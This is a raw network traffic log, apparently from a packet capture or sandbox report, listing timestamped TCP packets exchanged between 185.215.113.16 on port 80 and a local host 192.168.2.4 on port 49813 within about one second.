Dec 14, 2024 23:58:28.624171019 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.624214888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.624300957 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.624341965 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.625274897 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.625315905 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.625338078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.625377893 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.626230955 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.626272917 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.626523018 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.626564980 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.627351046 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.627392054 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.627418995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.627460957 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.628267050 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.628309011 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.628424883 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.628463984 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.629309893 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.629352093 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.629559994 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.629597902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.630378962 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.630418062 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.630484104 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.630522966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.631376982 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.631417990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.631571054 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.631609917 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.632406950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.632447004 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.632563114 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.632601976 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.633445024 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.633549929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.633646965 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.633728981 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.634493113 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.634536028 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.634684086 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.634723902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.635673046 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.635684967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.635714054 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.635742903 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.636524916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.636565924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.636739016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.636778116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.637617111 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.637656927 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.637805939 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.637844086 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.638605118 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.638648033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.638993979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.639034033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.639775991 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.639787912 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.639816999 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.639846087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.640680075 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.640719891 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.778812885 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.778891087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.779022932 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.779068947 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.779217005 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.779261112 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.779639959 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.779683113 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.780297995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.780342102 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.780514956 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.780563116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.781352043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.781405926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.781598091 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.782454014 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.782493114 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.782505989 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.782536030 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.783431053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.783543110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.783627033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.783847094 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.784430027 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.784471035 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.784548998 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.784708977 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.785423040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.785527945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.785682917 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.785742044 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.786604881 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.786617041 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.786647081 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.786679029 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.787667036 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.787686110 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.787841082 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.788702965 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.788714886 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.788758993 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.789652109 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.789695978 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.789757967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.789798021 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.790752888 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.790766001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.790796041 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.790827990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.791789055 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.791801929 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.791848898 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.792726040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.792777061 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.793262959 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.793303013 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.793751001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.793848038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.793852091 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.793881893 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.794749022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.794805050 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.794883966 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.794964075 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.795844078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.795932055 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.795996904 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.796966076 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.796977997 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.797008038 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.797038078 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.797908068 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.798017025 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.798074961 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.798250914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.798870087 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.798927069 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.799084902 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.799137115 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.799972057 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.800024033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.800064087 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.800103903 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.801022053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.801070929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.801405907 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.801445007 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.801997900 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.802040100 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.802114010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.802185059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.803050995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.803101063 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.803189993 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.803241014 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.804054976 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.804099083 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.804173946 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.804251909 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.805147886 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.805226088 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.805268049 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.806205988 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.806247950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.806253910 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.806303024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.807157040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.807269096 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.807344913 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.807492971 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.808167934 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.808298111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.808368921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.808489084 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.809334040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.809393883 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.809452057 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.809495926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.810224056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.810276031 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.810395956 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.810499907 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.811353922 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.811402082 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.811438084 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.811544895 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.812392950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.812437057 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.812499046 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.812565088 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.813297987 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.813344002 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.813798904 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.813843966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.814358950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.814407110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.814500093 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.814541101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.815372944 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.815438986 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.815547943 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.815646887 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.816504002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.816553116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.816781044 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.816827059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.817437887 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.817502975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.817600965 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.817661047 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.818651915 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.818667889 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.818851948 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.819546938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.819674015 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.819720984 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.819839954 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.820625067 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.820926905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.820956945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.820987940 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.821767092 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.821782112 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.821899891 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.822649002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.822726011 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.822774887 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.823088884 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.823642015 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.823687077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.823817015 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.823863983 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.824693918 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.824743986 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.824945927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.824991941 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.825783968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.825834036 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.826010942 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.826071024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.826761961 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.826808929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.826937914 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.826981068 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.827856064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.827903986 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.828026056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.828062057 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.828897953 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.828938007 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.829000950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.829037905 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.830013990 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.830027103 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.830060959 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.830888033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.830926895 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.831130028 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.831187010 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.831947088 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.831989050 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.832055092 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.832098007 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.832971096 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.833276033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.971086979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.971100092 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.971142054 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.971184015 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.971278906 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.971365929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.971401930 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.971461058 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.972290993 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.972393036 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.972465038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.972508907 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.973520041 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.973584890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.973603010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.973649979 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.974430084 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.974488020 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.974503040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.974545002 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.975418091 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.975505114 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.975626945 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.975681067 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.976506948 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.976564884 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.976622105 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.977502108 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.977581024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.977705956 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.977776051 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.978568077 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.978625059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.978674889 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.978724957 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.979563951 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.979621887 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.979705095 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.980284929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.980652094 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.980719090 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.980736971 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.980823040 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.981631994 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.981697083 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.981785059 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.981842995 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.982676983 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.982831955 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.982880116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.982880116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.983756065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.983810902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.983864069 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.983949900 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.984745026 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.984817982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.984854937 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.984908104 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.985881090 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.985918999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.985934019 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.985964060 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.986845970 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.986907005 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.986977100 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.987054110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.987941980 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.987977028 CET	80	49813	185.215.113.16	192.168.2.4
